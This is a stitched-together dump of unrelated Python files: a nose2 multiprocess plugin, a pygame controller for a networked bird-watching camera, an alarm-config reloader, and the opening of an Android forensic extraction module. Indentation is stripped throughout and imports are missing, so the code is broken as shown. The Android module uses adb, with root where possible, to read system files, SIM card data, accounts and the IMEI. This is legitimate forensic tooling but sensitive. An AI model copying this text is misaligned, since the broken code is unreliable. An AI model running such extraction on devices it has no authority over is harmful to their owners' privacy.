from nose2 import events, loader, result, runner, session, util
log = logging.getLogger(__name__)
class MultiProcess(events.Plugin):
configSection = 'multiprocess'
def __init__(self):
self.addArgument(self.setProcs, 'N', 'processes', '# of procs')
self.testRunTimeout = self.config.as_float('test-run-timeout', 60.0)
self.procs = self.config.as_int(
'processes', multiprocessing.cpu_count())
self.setAddress(self.config.as_str('bind_address', None))
self.cases = {}
def setProcs(self, num):
self.procs = int(num[0]) # FIXME merge n fix
self.register()
def setAddress(self, address):
if address is None or address.strip() == '':
address = []
else:
address = [x.strip() for x in address.split(':')[:2]]
#Background: On Windows, select.select only works on sockets. So the
#ability to select a bindable address and optionally port for the mp
#plugin was added. Pipes should support a form of select, but this
#would require using pywin32. There are alternatives but all have
#some kind of downside. An alternative might be creating a connection
#like object using a shared queue for incoming events.
self.bind_host = None
self.bind_port = 0
if sys.platform == "win32" or address:
self.bind_host = '127.116.157.163'
if address and address[0]:
self.bind_host = address[0]
self.bind_port = 0
if len(address) >= 2:
self.bind_port = int(address[1])
def pluginsLoaded(self, event):
self.addMethods('registerInSubprocess', 'startSubprocess',
'stopSubprocess')
def startTestRun(self, event):
event.executeTests = self._runmp
def beforeInteraction(self, event):
# prevent interactive plugins from running
event.handled = True
return False
def _runmp(self, test, result):
flat = list(self._flatten(test))
procs = self._startProcs(len(flat))
# send one initial task to each process
for proc, conn in procs:
if not flat:
break
caseid = flat.pop(0)
conn.send(caseid)
rdrs = [conn for proc, conn in procs if proc.is_alive()]
while flat or rdrs:
ready, _, _ = select.select(rdrs, [], [], self.testRunTimeout)
for conn in ready:
# XXX proc could be dead
try:
remote_events = conn.recv()
except EOFError:
# probably dead
log.warning("Subprocess connection closed unexpectedly")
continue # XXX or die?
if remote_events is None:
# XXX proc is done, how to mark it dead?
log.debug("Conn closed %s", conn)
rdrs.remove(conn)
continue
# replay events
testid, events = remote_events
log.debug("Received results for %s", testid)
for (hook, event) in events:
log.debug("Received %s(%s)", hook, event)
self._localize(event)
getattr(self.session.hooks, hook)(event)
# send a new test to the worker if there is one left
if not flat:
# if there isn't send None - it's the 'done' flag
conn.send(None)
continue
caseid = flat.pop(0)
conn.send(caseid)
for _, conn in procs:
conn.close()
# ensure we wait until all processes are done before
# exiting, to allow plugins running there to finalize
for proc, _ in procs:
proc.join()
def _prepConns(self):
"""
If the ``bind_host`` is not ``None``, return:
(multiprocessing.connection.Listener, (address, port, authkey))
else:
(parent_connection, child_connection)
For the former case, ``accept`` must be called on the listener in order
to get a ``Connection`` object for the socket.
"""
if self.bind_host is not None:
#prevent "accidental" wire crossing
authkey = os.urandom(20)
address = (self.bind_host, self.bind_port)
listener = connection.Listener(address, authkey=authkey)
return (listener, listener.address + (authkey,))
else:
return multiprocessing.Pipe()
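# Editor's note -- the two return shapes of _prepConns, sketched:
#   bind_host set:   (Listener(...), (host, port, authkey))  # accept() needed
#   bind_host None:  (parent_conn, child_conn)               # a plain Pipe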
def _acceptConns(self, parent_conn):
"""
When the listener is a :class:`connection.Listener` instance, accept the
next incoming connection, with a timeout. Since this functionality was
added to support mp over inet sockets, this method assumes a socket-based
listener, and will access the private _socket
member to get a low-level socket to do a select on.
"""
if isinstance(parent_conn, connection.Listener):
#ick private interface
rdrs = [parent_conn._listener._socket]
readable, _, _ = select.select(rdrs, [], [],
self.testRunTimeout)
if readable:
return parent_conn.accept()
else:
raise RuntimeError('MP: Socket Connection Failed')
else:
return parent_conn
def _startProcs(self, test_count):
# XXX create session export
session_export = self._exportSession()
procs = []
count = min(test_count, self.procs)
log.debug("Creating %i worker processes", count)
for i in range(0, count):
parent_conn, child_conn = self._prepConns()
proc = multiprocessing.Process(
target=procserver, args=(session_export, child_conn))
proc.daemon = True
proc.start()
parent_conn = self._acceptConns(parent_conn)
procs.append((proc, parent_conn))
return procs
def _flatten(self, suite):
# XXX
# examine suite tests to find out if they have class
# or module fixtures and group them that way into names
# of test classes or modules
# ALSO record all test cases in self.cases
log.debug("Flattening test into list of IDs")
mods = {}
classes = {}
stack = [suite]
while stack:
suite = stack.pop()
for test in suite:
if isinstance(test, unittest.TestSuite):
stack.append(test)
else:
testid = util.test_name(test)
self.cases[testid] = test
if util.has_module_fixtures(test):
mods.setdefault(test.__class__.__module__, []).append(
testid)
elif util.has_class_fixtures(test):
classes.setdefault(
"%s.%s" % (test.__class__.__module__,
test.__class__.__name__),
[]).append(testid)
else:
yield testid
for cls in sorted(classes.keys()):
yield cls
for mod in sorted(mods.keys()):
yield mod
def _localize(self, event):
# XXX set loader, case, result etc to local ones, if present in event
# (event case will be just the id)
# (traceback in exc_info if any won't be real!)
if hasattr(event, 'result'):
event.result = self.session.testResult
if hasattr(event, 'loader'):
event.loader = self.session.testLoader
if hasattr(event, 'runner'):
event.runner = self.session.testRunner
if hasattr(event, 'test') and isinstance(event.test, six.string_types):
# remote event.case is the test id
try:
event.test = self.cases[event.test]
except KeyError:
event.test = self.session.testLoader.failedLoadTests(
'test_not_found',
RuntimeError("Unable to locate test case for %s in "
"main process" % event.test))._tests[0]
def _exportSession(self):
# argparse isn't pickleable
# no plugin instances
# no hooks
export = {'config': self.session.config,
'verbosity': self.session.verbosity,
'startDir': self.session.startDir,
'topLevelDir': self.session.topLevelDir,
'logLevel': self.session.logLevel,
# XXX classes or modules?
'pluginClasses': []}
# XXX fire registerInSubprocess -- add those plugin classes
# (classes must be pickleable!)
event = RegisterInSubprocessEvent() # FIXME should be own event type
self.session.hooks.registerInSubprocess(event)
export['pluginClasses'].extend(event.pluginClasses)
return export
def procserver(session_export, conn):
# init logging system
rlog = multiprocessing.log_to_stderr()
rlog.setLevel(session_export['logLevel'])
# make a real session from the "session" we got
ssn = session.Session()
ssn.config = session_export['config']
ssn.hooks = RecordingPluginInterface()
ssn.verbosity = session_export['verbosity']
ssn.startDir = session_export['startDir']
ssn.topLevelDir = session_export['topLevelDir']
ssn.prepareSysPath()
loader_ = loader.PluggableTestLoader(ssn)
ssn.testLoader = loader_
result_ = result.PluggableTestResult(ssn)
ssn.testResult = result_
runner_ = runner.PluggableTestRunner(ssn) # needed??
ssn.testRunner = runner_
# load and register plugins
ssn.plugins = [
plugin(session=ssn) for plugin in session_export['pluginClasses']]
rlog.debug("Plugins loaded: %s", ssn.plugins)
for plugin in ssn.plugins:
plugin.register()
rlog.debug("Registered %s in subprocess", plugin)
if isinstance(conn, collections.abc.Sequence):
conn = connection.Client(conn[:2], authkey=conn[2])
event = SubprocessEvent(loader_, result_, runner_, ssn.plugins, conn)
res = ssn.hooks.startSubprocess(event)
if event.handled and not res:
conn.send(None)
conn.close()
ssn.hooks.stopSubprocess(event)
return
# receive and run tests
executor = event.executeTests
for testid in gentests(conn):
if testid is None:
break
# XXX to handle weird cases like layers, need to
# deal with the case that testid is something other
# than a simple string.
test = event.loader.loadTestsFromName(testid)
# xxx try/except?
rlog.debug("Execute test %s (%s)", testid, test)
executor(test, event.result)
events = [e for e in ssn.hooks.flush()]
conn.send((testid, events))
rlog.debug("Log for %s returned", testid)
conn.send(None)
conn.close()
ssn.hooks.stopSubprocess(event)
# test generator
def gentests(conn):
while True:
try:
testid = conn.recv()
if testid is None:
return
yield testid
except EOFError:
return
# custom event classes
class SubprocessEvent(events.Event):
"""Event fired at start and end of subprocess execution.
.. attribute :: loader
Test loader instance
.. attribute :: result
Test result
.. attribute :: plugins
List of plugins loaded in the subprocess.
.. attribute :: connection
The :class:`multiprocessing.Connection` instance that the
subprocess uses for communication with the main process.
.. attribute :: executeTests
Callable that will be used to execute tests. Plugins may set
this attribute to wrap or otherwise change test execution. The
callable must match the signature::
def execute(suite, result):
...
"""
def __init__(self, loader, result, runner, plugins, connection, **metadata):
self.loader = loader
self.result = result
self.runner = runner
self.plugins = plugins
self.connection = connection
self.executeTests = lambda test, result: test(result)
super(SubprocessEvent, self).__init__(**metadata)
class RegisterInSubprocessEvent(events.Event):
"""Event fired to notify plugins that multiprocess testing will occur
.. attribute :: pluginClasses
Add a plugin class to this list to cause the plugin to be
instantiated in each test-running subprocess. The most common
thing to do, for plugins that need to run in subprocesses, is::
def registerInSubprocess(self, event):
event.pluginClasses.append(self.__class__)
"""
def __init__(self, **metadata):
self.pluginClasses = []
super(RegisterInSubprocessEvent, self).__init__(**metadata)
# custom hook system that records calls and events
class RecordingHook(events.Hook):
def __init__(self, method, interface):
super(RecordingHook, self).__init__(method)
self.interface = interface
def __call__(self, event):
res = super(RecordingHook, self).__call__(event)
self.interface.log(self.method, event)
return res
class RecordingPluginInterface(events.PluginInterface):
hookClass = RecordingHook
noLogMethods = set(
['getTestCaseNames', 'startSubprocess', 'stopSubprocess',
'registerInSubprocess', 'moduleLoadedSuite'])
def __init__(self):
super(RecordingPluginInterface, self).__init__()
self.events = []
def log(self, method, event):
self.events.append((method, event))
def flush(self):
events = self.events[:]
self.events = []
return events
def register(self, method, plugin):
"""Register a plugin for a method.
:param method: A method name
:param plugin: A plugin instance
"""
self._hookForMethod(method).append(plugin)
def __getattr__(self, attr):
if attr.startswith('__'):
raise AttributeError('No %s in %s' % (attr, self))
return self._hookForMethod(attr)
def _hookForMethod(self, method):
# return recording hook for most hooks, normal hook for those
# (like test loading and subprocess events) that we don't want
# to send back to the main process.
try:
return self.hooks[method]
except KeyError:
if method in self.noLogMethods or method.startswith('loadTest'):
hook = events.Hook(method)
else:
hook = self.hookClass(method, self)
self.hooks[method] = hook
return hook
|
camera_control.py
|
#!/usr/bin/env python3
import requests
import io
import os
from datetime import datetime
import random
import time
from urllib.parse import quote
import multiprocessing, threading
from detection import yolo_all
import rtsp
import cv2
import pygame
import numpy as np
IP_ADDRESS = "192.168.1.115"
AUTH = (os.getenv("BIRDCAM_USER"), os.getenv("BIRDCAM_PASS"))
if None in AUTH:
print("Did not detect environment variables BIRDCAM_USER and BIRDCAM_PASS")
commands = ('left', 'right', 'up', 'down', 'home', 'stop', 'zoomin', 'zoomout', 'focusin', 'focusout', 'hscan', 'vscan')
presets = ((0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1))
infrared = "open", "close", "auto"
black = (0,0,0)
white = (255,255,255)
HORIZONTAL_AXIS = 2
HORIZONTAL_DEADZONE = 0.1
VERTICAL_AXIS = 1
VERTICAL_DEADZONE = 0.3
SPEED_AXIS = 3
PRESET_HAT = 0
ZOOM_IN = 3
ZOOM_OUT = 4
FOCUS_IN = 1
FOCUS_OUT = 2
SNAPSHOT = 0
SPEED_RANGE = (1, 63)
SPEED_THRESHOLD = 0.001
IR_TOGGLE = 6
client = rtsp.Client(rtsp_server_uri = f'rtsp://{IP_ADDRESS}:554/1')
def main():
# Initialize image processing
image_queue = multiprocessing.Queue()
boxes = multiprocessing.Queue()
image_process = multiprocessing.Process(target = yolo_all.image_process, args=[image_queue, boxes])
image_process.start()
bird_boxes = []
# motion tracking
back_sub = cv2.createBackgroundSubtractorMOG2(history=700,
varThreshold=25, detectShadows=True)
kernel = np.ones((30,30),np.uint8)
# Initialize pygame
pygame.init()
pygame.font.init()
myfont = pygame.font.SysFont('Consolas', 30)
display_size = 800,448
image_size = 800, 448
hq_size = 2560,1440
display = pygame.display.set_mode(display_size)#, pygame.NOFRAME)
pygame.display.set_caption('Bird Cam Controls')
keys = {k:pygame.__dict__[k] for k in pygame.__dict__ if k[0:2] == "K_"}
click_point = None
# joystick
joystick = None
for i in range(pygame.joystick.get_count()):
js = pygame.joystick.Joystick(i)
print(f"Detected joystick {js.get_name()}")
if js.get_name() == "WingMan Force 3D":
joystick = js
break
joystick = None # TODO: delete this line
# Camera movement
last_hspeed = last_vspeed = 0
last_speed = 1
preset = (0, 0)
last_preset = (0, 0)
snapshot_held = False
horizontal = vertical = 0
hspeed = vspeed = 0
speed_modifier = 0.1
alternate = False
alternate_timer = time.time() + 0.25
# Information display
show_ui = True
horizontal_info = myfont.render('H 0 0', False, white)
vertical_info = myfont.render('V 0 0', False, white)
infrared_index = infrared.index(get_infrared())
ir_toggling = False
ir_info = myfont.render(f'IR {infrared[infrared_index]}', False, white)
ai_active = True
ai_info = myfont.render(f'AI {"Active" if ai_active else "Inactive"}', False, white)
processing_image = False
box_timer = time.time()
GOOD_BIRD = myfont.render(f'good bird', False, black)
set_name("birdcam")
set_time()
while True:
# Send images / receive bounds
if ai_active:
if processing_image:
if not boxes.empty():
box = boxes.get(False)
if box:
print(f"DETECTED: {box}")
bird_boxes = box
box_timer = time.time() + 15
processing_image = False
else:
snapshot = get_snapshot(high_quality=True)
image_queue.put(snapshot)
processing_image = True
# Get joystick axes
if joystick:
horizontal = joystick.get_axis(HORIZONTAL_AXIS)
vertical = joystick.get_axis(VERTICAL_AXIS)
speed_modifier = max((-joystick.get_axis(SPEED_AXIS) + 0.5)/1.5, 0)
# Get mouse/keyboard events
for event in pygame.event.get():
if event.type == pygame.QUIT: # x in titlebar
halt(image_process)
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
halt(image_process)
elif event.key in range(pygame.K_0, pygame.K_9 + 1):
ctrl_preset(event.key - pygame.K_0)
elif event.key == pygame.K_LEFT:
horizontal = -1
elif event.key == pygame.K_RIGHT:
horizontal = 1
elif event.key == pygame.K_UP:
vertical = 1
elif event.key == pygame.K_DOWN:
vertical = -1
elif event.key == pygame.K_a:
ai_active = not ai_active
ai_info = myfont.render(f'AI {"Active" if ai_active else "Inactive"}', False, white)
elif event.key == pygame.K_EQUALS:
send_command('zoomin', 50)
elif event.key == pygame.K_MINUS:
send_command('zoomout', 50)
elif event.key == pygame.K_RIGHTBRACKET:
send_command('focusin', 50)
elif event.key == pygame.K_LEFTBRACKET:
send_command('focusout', 50)
elif event.key == pygame.K_SPACE:
display.fill(white)
pygame.display.update()
take_snapshot(client)
elif event.key == pygame.K_i:
infrared_index = (infrared_index + 1) % 3
ir_info = myfont.render(f'IR {infrared[infrared_index]}'.replace("open", "on").replace("close", "off"), False, white)
toggle_infrared(infrared_index)
elif event.key == pygame.K_u:
show_ui = not show_ui
elif event.key == pygame.K_LSHIFT:
speed_modifier = 1
elif event.key == pygame.K_LCTRL:
speed_modifier = 0.01
else:
for k in keys:
if keys[k] == event.key:
print(k)
break
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT and horizontal == -1:
horizontal = 0
elif event.key == pygame.K_RIGHT and horizontal == 1:
horizontal = 0
if event.key == pygame.K_UP and vertical == 1:
vertical = 0
elif event.key == pygame.K_DOWN and vertical == -1:
vertical = 0
elif event.key in (pygame.K_LSHIFT, pygame.K_LCTRL):
speed_modifier = 0.1
if event.key in (pygame.K_LEFTBRACKET, pygame.K_RIGHTBRACKET, pygame.K_EQUALS, pygame.K_MINUS):
send_command('stop')
elif event.type == pygame.MOUSEBUTTONDOWN:
pos = event.pos
click_point = pos
elif event.type == pygame.JOYBUTTONDOWN:
if joystick.get_button(ZOOM_IN):
send_command('zoomin', 0)
if joystick.get_button(ZOOM_OUT):
send_command('zoomout', 0)
if joystick.get_button(FOCUS_IN):
send_command('focusin', 0)
if joystick.get_button(FOCUS_OUT):
send_command('focusout', 0)
if joystick.get_button(SNAPSHOT):
if not snapshot_held:
display.fill(white)
pygame.display.update()
take_snapshot(client)
snapshot_held = True
if joystick.get_button(IR_TOGGLE):
if not ir_toggling:
ir_toggling = True
infrared_index = (infrared_index + 1) % 3
ir_info = myfont.render(f'IR {infrared[infrared_index]}'.replace("open", "on").replace("close", "off"), False, white)
toggle_infrared(infrared_index)
elif event.type == pygame.JOYBUTTONUP:
if not joystick.get_button(IR_TOGGLE):
ir_toggling = False
send_command('stop')
last_hspeed = last_vspeed = 0
if not joystick.get_button(SNAPSHOT):
snapshot_held = False
# Pan and Tilt
hspeed = (max(abs(horizontal) - HORIZONTAL_DEADZONE, 0)/(1 - HORIZONTAL_DEADZONE))**2 * speed_modifier
vspeed = (max(abs(vertical) - VERTICAL_DEADZONE, 0)/(1 - VERTICAL_DEADZONE))**2 * speed_modifier
if vspeed <= SPEED_THRESHOLD and hspeed <= SPEED_THRESHOLD and (last_vspeed > SPEED_THRESHOLD or last_hspeed > SPEED_THRESHOLD):
send_command('stop')
elif vspeed > SPEED_THRESHOLD and hspeed > SPEED_THRESHOLD:
if alternate:
if alternate_timer <= time.time():
alternate = not alternate
alternate_timer = time.time() + 0.25
send_command('left' if horizontal < 0 else 'right', round(hspeed * 2 * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
else:
if alternate_timer <= time.time():
alternate = not alternate
alternate_timer = time.time() + 0.25
send_command('down' if vertical < 0 else 'up', round(vspeed * 2 * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
elif vspeed > SPEED_THRESHOLD:
send_command('down' if vertical < 0 else 'up', round(vspeed * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
elif hspeed > SPEED_THRESHOLD:
send_command('left' if horizontal < 0 else 'right', round(hspeed * (SPEED_RANGE[1]-SPEED_RANGE[0]) + SPEED_RANGE[0]))
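# Editor's note -- a worked example of the mapping above (axis values
# illustrative): horizontal=0.55 with HORIZONTAL_DEADZONE=0.1 and
# speed_modifier=0.1 gives hspeed = ((0.55-0.1)/0.9)**2 * 0.1 = 0.025,
# which the send_command calls scale into the 1..63 device speed range.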
if joystick:
preset = joystick.get_hat(PRESET_HAT)
if preset != (0, 0) and preset != last_preset:
ctrl_preset(presets.index(preset))
last_vspeed, last_hspeed = vspeed, hspeed
last_preset = preset
last_speed = speed_modifier
# Display the latest image
raw_snapshot = get_snapshot()
"""
frame = yolo_all.load_image(raw_snapshot)
# Use every frame to calculate the foreground mask and update
# the background
fg_mask = back_sub.apply(frame)
# Close dark gaps in foreground object using closing
fg_mask = cv2.morphologyEx(fg_mask, cv2.MORPH_CLOSE, kernel)
# Remove salt and pepper noise with a median filter
fg_mask = cv2.medianBlur(fg_mask, 5)
fg_mask = cv2.erode(fg_mask,kernel,iterations = 3)
cv2.imshow('mask', fg_mask)
# Threshold the image to make it either black or white
_, fg_mask = cv2.threshold(fg_mask,127,255,cv2.THRESH_BINARY)
# Find the index of the largest contour and draw bounding box
fg_mask_bb = fg_mask
contours, hierarchy = cv2.findContours(fg_mask_bb,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)[-2:]
areas = [cv2.contourArea(c) for c in contours]
# If there are no countours
if len(areas) > 0:
for max_index in range(len(areas)):
# Draw the bounding box
cnt = contours[max_index]
x,y,w,h = cv2.boundingRect(cnt)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),3)
is_success, buffer = cv2.imencode(".jpg", frame) # io.BytesIO(raw_snapshot)
image = pygame.image.load(io.BytesIO(buffer))
"""
image = pygame.image.load(io.BytesIO(raw_snapshot))
image = pygame.transform.scale(image, display_size)
display.blit(image, (0,0))
# Display control information
if show_ui:
pygame.draw.rect(display,black,(5,30,240,150))
pygame.draw.circle(display,black,((display_size[0]-10)/2,(display_size[1]-10)/2), 10, 3)
horizontal_info = myfont.render(f'H {hspeed:.3f}', False, white)
vertical_info = myfont.render(f'V {vspeed:.3f}', False, white)
speed_info = myfont.render(f'S {speed_modifier:.3f}', False, white)
display.blit(horizontal_info, (5,30))
display.blit(vertical_info, (5,60))
display.blit(speed_info, (5,90))
display.blit(ir_info, (5,120))
display.blit(ai_info, (5,150))
if click_point:
pygame.draw.circle(display, (255,0,0), click_point, 3, 3)
for box in bird_boxes:
x1,y1,x2,y2, label, confidence = box
scale = (display_size[0]/hq_size[0], display_size[1]/hq_size[1])
rect = (x1*scale[0], y1*scale[1], (x2-x1)*scale[0], (y2-y1)*scale[1])
#pygame.draw.rect(display, black, rect, width=2)
if label == "bird":
display.blit(GOOD_BIRD, ((rect[0]+rect[2])/2, (rect[1]+rect[3])/2))
if bird_boxes and time.time() > box_timer:
bird_boxes = []
# Update the screen
pygame.display.update()
display.fill(black)
def halt(image_process):
if image_process:
image_process.terminate()
image_process.join()
exit()
def send_command(name, speed=1):
if speed > SPEED_RANGE[1] - 1:
speed = 0 # speed 0 goes faster than max speed
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/ptzctrl.cgi?-step=0&-act={name}&-speed={int(round(speed))}"
return requests.get(request, auth=AUTH)
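# Editor's note -- e.g. send_command('left', 32) issues a GET like
# http://<IP_ADDRESS>/cgi-bin/hi3510/ptzctrl.cgi?-step=0&-act=left&-speed=32
# (URL shape taken directly from the f-string above).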
def ctrl_preset(name):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/preset.cgi?-act=goto&-number={name}"
return requests.get(request, auth=AUTH)
def set_preset(name):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/preset.cgi?-act=set&-status=1&-number={name}"
return requests.get(request, auth=AUTH)
def get_snapshot(high_quality=False):
request = f"http://{IP_ADDRESS}/tmpfs/{'snap' if high_quality else 'auto'}.jpg"
response = requests.get(request, auth=AUTH)
return response.content
def save_hqsnapshot(filename):
content = get_snapshot(high_quality=True)
with open(filename, "wb") as f:
f.write(content)
def save_rtsp_snapshot(rtsp_client, filename):
pygame.time.wait(500) # wait for the video feed to catch up
snapshot = rtsp_client.read()
snapshot.save(filename)
def take_snapshot(rtsp_client=None):
filename = datetime.now().strftime("%Y%m%d-%H%M%S.jpg")
if rtsp_client:
threading.Thread(target=save_rtsp_snapshot, args=[rtsp_client, filename]).start()
else:
threading.Thread(target=save_hqsnapshot, args=[filename,]).start()
def toggle_infrared(index):
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/param.cgi?cmd=setinfrared&-infraredstat={infrared[index]}"
return requests.get(request, auth=AUTH)
def get_infrared():
request = f"http://{IP_ADDRESS}/cgi-bin/hi3510/param.cgi?cmd=getinfrared"
return requests.get(request, auth=AUTH).content.decode("utf8").strip().split("=")[-1][1:-2]
def set_name(name):
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=setoverlayattr&-region=1&-show=1&-name={quote(name)}"
return requests.get(request, auth=AUTH)
def set_time():
current_time = datetime.now().strftime("%Y.%m.%d.%H.%M.%S")
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=setservertime&-time={current_time}"
return requests.get(request, auth=AUTH)
def load_config():
request = f"http://{IP_ADDRESS}/web/cgi-bin/hi3510/param.cgi?cmd=getlanguage&cmd=getvideoattr&cmd=getimageattr&cmd=getsetupflag&cmd=getimagemaxsize&cmd=getaudioflag&cmd=getserverinfo&cmd=getvideoattr&cmd=getircutattr&cmd=getinfrared&cmd=getrtmpattr&cmd=gethttpport&cmd=getlampattrex"
response = requests.get(request, auth=AUTH)
config = {}
for line in response.content.decode("utf8").strip().split("\r\n"):
k, v = line[4:].split("=")
config[k] = v
return config
if __name__ == "__main__":
main()
|
load_alarm_config.py
|
import threading
import time
from server_common.utilities import print_and_log
class AlarmConfigLoader(object):
"""
Alarm configuration loader class: creates a new configuration and loads it into the alarm server. While the
instance exists it counts down; when the countdown reaches 0 it stops being the current instance and
restarts the alarm server with a new config.
Currently it does this by restarting the alarm server after a delay. It is a singleton: there is only one
instance at any one time.
"""
# Instance of this singleton
_instance = None
# Number of seconds to delay the reload by so that IOC has started and published its alarmed PVs
DELAY = 20
# lock for accessing the delay and instance variables.
lock = threading.Lock()
thread = None
def __init__(self, ioc_control):
"""
Constructor
:param ioc_control: ioc control class to enable this class to restart the Alarm IOC
"""
self._delay_left = AlarmConfigLoader.DELAY
self._ioc_control = ioc_control
def run(self):
"""
Delay until the time has run out, then recreate the alarm config and reload it. This method should be called in
a thread because it is blocking.
"""
while self._is_still_delayed():
time.sleep(1)
self._ioc_control.restart_ioc("ALARM", force=True)
def do_reset_alarm(self):
"""
Thread-safe way to restart the counter.
"""
with AlarmConfigLoader.lock:
self._delay_left = AlarmConfigLoader.DELAY
print_and_log("Alarm server will update in {0} seconds from now".format(self._delay_left))
def _is_still_delayed(self):
"""
Reduce the delay by 1 and check if it has run out. If it is no longer delayed, remove this instance.
:return: True if still delayed; False otherwise
"""
with AlarmConfigLoader.lock:
self._delay_left -= 1
if self._delay_left > 0:
return True
AlarmConfigLoader._instance = None
return False
@staticmethod
def restart_alarm_server(ioc_control):
instance = AlarmConfigLoader._get_instance(ioc_control)
instance.do_reset_alarm()
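# Editor's note -- typical call site, sketched (the ioc_control argument
# comes from the block server; variable name hypothetical):
#   AlarmConfigLoader.restart_alarm_server(ioc_control)
# Repeated calls within DELAY seconds simply reset the countdown.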
@staticmethod
def _get_instance(ioc_control):
"""
Get the instance of the load alarm config
:param ioc_control (BlockServer.core.ioc_control.IocControl):
:return (AlarmConfigLoader): instance of the alarm config loader
"""
with AlarmConfigLoader.lock:
if AlarmConfigLoader._instance is None:
AlarmConfigLoader._instance = AlarmConfigLoader(ioc_control)
AlarmConfigLoader.thread = threading.Thread(target=AlarmConfigLoader._instance.run)
AlarmConfigLoader.thread.start()
return AlarmConfigLoader._instance
|
driller.py
|
import os
import re
import time
import shutil
import logging
import tarfile
import pathlib
import tempfile
import webbrowser
import threading
from contextlib import suppress
from timeout_decorator.timeout_decorator import TimeoutError
from . import utils
from . import engines
from . import messages
from . import decoders
from . import adb_conn
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class ChainExecution:
USER = 'shell'
ROOT = 'root'
ROOTSU = 'root-su'
DATA_STORE = 'DataStore.tar'
extract_dir = 'data'
def __init__(self, base_dir, status_msg=None, use_adb=False, **kwargs):
self.tools = utils.DrillerTools()
self.base_dir = base_dir
self.work_dir = None
self.updater = status_msg
if use_adb:
self.adb = adb_conn.ADBConn()
self.registry = decoders.Registry()
self.targets = None
self.REPORT = {}
self.DECODED = []
self.DOWNLOADS = []
self.DataStore = None
self.do_shared = kwargs.get('do_shared', False)
self.backup = kwargs.get('backup')
# self.backup_pw = kwargs.get('backup_pw') # TODO
self.tarfile = kwargs.get('tarfile')
self.src_dir = kwargs.get('src_dir')
self.WB = None
self.logger = kwargs.get('logger', logger)
def setup(self):
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
data_store = os.path.join(self.work_dir, self.DATA_STORE)
self.DataStore = tarfile.open(data_store, 'a')
def CleanUp(self):
self.DataStore.close()
datastore_file = os.path.abspath(self.DataStore.fileobj.name)
utils.hash_file(datastore_file)
# Delete temp tar file
default_temp = tempfile.gettempdir()
tf = self.tarfile
if tf and os.path.isfile(tf) and tf.startswith(default_temp):
os.remove(tf)
self.update('Finished.')
    def update(self, msg, info=True):
        # use the instance logger consistently (the debug branch previously used
        # the module logger)
        if info:
            self.logger.info(msg)
        else:
            self.logger.debug(msg)
        if self.updater:
            self.updater.set(msg)
            self.updater._root.update()
def InitialAdbRead(self):
self.update('Reading information...')
def get_permission():
self.su = False
if 'root' in self.adb('shell id'):
self.permisson = self.ROOT
return self.permisson
try_su = self.adb('shell id', su=True)
if try_su is not None and self.ROOT in try_su:
self.permisson = self.ROOTSU
self.su = True
else:
self.permisson = self.USER
return self.permisson
def get_prop(prop: list, key: str):
for row in prop:
if key in row:
return row.strip().split('=')[1]
def get_wifi(dump: list):
dump = list(filter(lambda x: x.startswith('mWifiInfo'), dump))
if dump:
src = re.search(r'MAC: ([:0-9a-f]{17}),', dump[0])
if src:
return src.groups()[0]
def get_accounts(dump):
accs = re.findall(r'Account \{name=(.+?), type=(.+?)\}', dump, re.S)
return [(v, k) for k, v in accs]
# Serial, status, permissions
self.REPORT['serial'], self.REPORT['status'] = self.adb.device()
self.REPORT['permisson'] = get_permission()
# Build Props
with suppress(TimeoutError):
build_prop = self.adb('shell cat /system/build.prop', su=self.su, timeout=5)
if build_prop:
build_prop = build_prop.split('\n')
props = [
'ro.product.manufacturer',
'ro.product.model',
'ro.build.version.release',
'ro.build.display.id']
for p in props:
self.REPORT[p] = get_prop(build_prop, p)
# WIFI
with suppress(TimeoutError):
_wifi = self.adb('shell dumpsys wifi', timeout=5)
if _wifi:
self.REPORT['wifi mac'] = get_wifi(_wifi.split('\n'))
# IMEI
with suppress(TimeoutError):
_usbinfo = self.adb('shell dumpsys iphonesubinfo', timeout=5)
if _usbinfo:
self.REPORT['imei'] = get_prop(_usbinfo.split('\n'), 'Device ID')
# IMEI for Android v6+
# with suppress(TimeoutError):
# rex = re.compile(b' ([0-9a-f]{8})')
# _data = self.adb('adb shell service call iphonesubinfo 1', timeout=2)
# if _data and len(_data) > 9:
# plen = int(b''.join(_data[:2]), 16)
# Time
with suppress(TimeoutError):
self.REPORT['local_time'] = time.strftime('%Y-%m-%d %H:%M:%S %Z')
rtime = self.adb(['shell', 'date', r'+%F\ %T\ %Z'], timeout=5)
self.REPORT['device_time'] = rtime.split(self.adb.rmr.decode())[-1]
# SIM Card
with suppress(TimeoutError, Exception):
if self.adb.exists('/data/system/SimCard.dat'):
_simdat = self.adb('shell cat /data/system/SimCard.dat', su=self.su, timeout=5)
sims = [
'CurrentSimSerialNumber',
'CurrentSimPhoneNumber',
'CurrentSimOperatorName',
'PreviousSimSerialNumber',
'PreviousSimPhoneNumber']
if _simdat:
_simdat = _simdat.split('\n')
for s in sims:
self.REPORT[s] = get_prop(_simdat, s)
# Accounts
with suppress(TimeoutError):
_acc = self.adb('shell dumpsys account', timeout=5)
self.REPORT['accounts'] = get_accounts(_acc)
@staticmethod
def clean_name(value):
return re.sub(r'[\s\/:*?"<>|]', '', value)
def CreateWorkDir(self):
date_ = time.strftime('%Y-%m-%d')
time_ = time.strftime('%H.%M.%S')
try:
self.work_dir = os.path.join(
self.base_dir,
'{}_{}_{}_{}'.format(
self.clean_name(
self.REPORT.get('ro.product.manufacturer', self.REPORT['serial'])),
self.clean_name(
self.REPORT.get('ro.product.model', self.REPORT['permisson'])),
date_, time_,))
except Exception:
self.work_dir = os.path.join(self.base_dir, f'andriller_extraction_{date_}_{time_}')
